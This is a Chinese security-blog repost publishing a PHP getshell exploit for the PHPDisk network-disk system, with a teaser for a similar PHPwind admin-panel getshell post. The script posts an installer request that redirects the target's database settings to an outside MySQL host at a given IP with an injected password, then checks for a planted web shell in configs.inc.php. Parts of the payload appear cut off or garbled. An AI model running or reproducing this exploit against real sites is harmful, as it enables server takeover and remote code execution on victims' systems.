phpdisk header bypass & getShell exp

  • A+
所属分类:lcx

PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的东东…..

文章是上个星期写的  文中的 98.126.4.252  已然失效   临时改为  98.126.4.251

如果还不行 请大家去找 能外链的 mysql    改密码为

',);?>

phpdisk 漏洞发布 -- phpdisk header bypass & getShell exp

';
$data="step=5&dbhost=98.126.4.251&dbuser=root&dbname=mysql&dbpasswd=".$pass;

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$result=curl_exec($ch);
curl_close($ch);

$shell="http://".$site.'/system/configs.inc.php';

if(strpos(@file_get_contents($shell),'pconnect')){
    echo  "Hi  guy  I  get the  Shell:".$shell;
}else{
    echo   "Shit !!!   This   Site:$site  Can  not   get  Shell";
}
?>

具体代码审计文章 +exp   还是附件的干活:Phpdisk  header bypass  & getShell  exp

代码审计文章(非附件、在线版):phpdisk header bypass & getShell exp.doc

文章来源于lcx.cc:phpdisk header bypass & getShell exp

相关推荐: 【转载】PHPwind 7.5 sp3 后台拿shell

作者:meao 出自:www.secmao.tk 常规设置:站点地址和管理员邮箱处插入代码 站点地址:http://''''''''''''''''''''''''''''''''''' 管理员邮箱:''''''''''''''''''''''''''''''…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: